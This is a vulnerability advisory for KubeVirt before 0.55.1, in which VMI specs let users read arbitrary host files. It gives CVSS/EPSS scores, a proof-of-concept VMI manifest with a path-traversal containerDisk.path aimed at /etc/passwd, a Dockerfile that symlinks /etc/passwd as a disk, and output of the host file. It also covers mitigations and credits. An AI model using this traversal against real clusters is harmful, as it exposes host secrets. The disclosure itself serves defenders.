6.5 Medium
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
6.8 Medium
AI Score
Confidence
Low
1.7 Low
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:L/AC:L/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
25.5%
Users with the permission to create VMIs can construct VMI specs which allow them to read arbitrary files on the host. There are three main attack vectors:
spec.domain.firmware.kernelBoot.container.kernelPath
, spec.domain.firmware.kernelBoot.container.initrdPath
as well as spec.volumes[*].containerDisk.path
.Example:
apiVersion: [kubevirt.io/v1](http://kubevirt.io/v1)
kind: VirtualMachineInstance
metadata:
name: vmi-fedora
spec:
domain:
devices:
disks:
- disk:
bus: virtio
name: containerdisk
- disk:
bus: virtio
name: cloudinitdisk
- disk:
bus: virtio
name: containerdisk1
rng: {}
resources:
requests:
memory: 1024M
terminationGracePeriodSeconds: 0
volumes:
- containerDisk:
image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)
name: containerdisk
- containerDisk:
image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)
path: test3/../../../../../../../../etc/passwd
name: containerdisk1
- cloudInitNoCloud:
userData: |
#!/bin/sh
echo 'just something to make cirros happy'
name: cloudinitdisk
FROM <anybase>
RUN mkdir -p /etc/ && touch /etc/passwd
RUN mkdir -p /disks/ && ln -s /etc/passwd /disks/disk.img
In all three cases it is then possible to at lest read any host file:
$ sudo cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...]
KubeVirt 0.55.1 provides patches to fix the vulnerability.
HotplugVolumes
feature-gate is disabledspec.domain.firmware.kernelBoot
is not used on VirtualMachineInstances.|Disclosure notice form the discovering party: https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm
For interested vendors which have to provide a fix for their supported versions, the following PRs are providing the fix:
Oliver Brooks and James Klopchic of NCC Group
Diane Dubois and Roman Mohr of Google
CPE | Name | Operator | Version |
---|---|---|---|
kubevirt.io/kubevirt | lt | 0.55.1 | |
kubevirt.io/kubevirt | ge | 0.20.0 |
6.5 Medium
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
6.8 Medium
AI Score
Confidence
Low
1.7 Low
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:L/AC:L/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
25.5%